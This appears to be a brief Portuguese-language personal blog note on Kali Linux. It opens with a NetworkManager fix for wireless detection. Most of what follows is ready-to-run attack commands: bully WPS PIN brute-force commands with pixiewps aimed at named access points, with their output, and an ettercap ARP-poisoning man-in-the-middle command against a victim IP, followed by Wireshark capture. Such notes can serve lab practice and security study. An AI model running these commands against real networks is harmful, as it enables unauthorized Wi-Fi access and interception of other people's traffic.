Kali

menos que 1 minuto(s) de leitura

Bugs

Em novembro de 2023 notei que o Kali não encontrava as redes. Lendo o post kali linux doesn’t detect wireless networks

sudo nano /etc/NetworkManager/NetworkManager.conf

systemctl status NetworkManager
systemctl restart NetworkManager
systemctl start NetworkManager


Alterar para..

[ifupdown]
managed=true



Bully

# Associação
sudo bully --bssid D8:C6:78:0F:73:14 --essid VIVO-7314 --eapfail --nofcs --pixiewps --channel 11 --verbosity 4 wlan0mon
#[!] Received disassociation/deauthentication from the AP
#[+] Rx(  M1  ) = 'EAPFail'   Next pin '20075361'

# Mi 8 Lite
sudo bully --bssid 5E:8F:53:F6:37:D0 --essid "MI 8 Lite" --eapfail --nofcs --pixiewps --channel 11 --verbosity 4 wlan0mon



ARP Poison

How Hackers SNiFF (capture) network traffic // MiTM attack

# Scan network looking for devices
sudo nmap -sn 192.168.0.1/24

# Man-in-the-Middle (MiTM) attack
sudo ettercap -T -S -i {interface} -M arp:remote /{ip router}// /{ip vítima}//
sudo ettercap -T -S -i wlan0mon -M arp:remote /192.168.0.1// /192.168.0.110//
#-T	text-only
#-S	no use ssl

# After capture using wireshark
sudo wireshark

Tags:

Categorias: ,

Atualizado em:

Deixe um comentário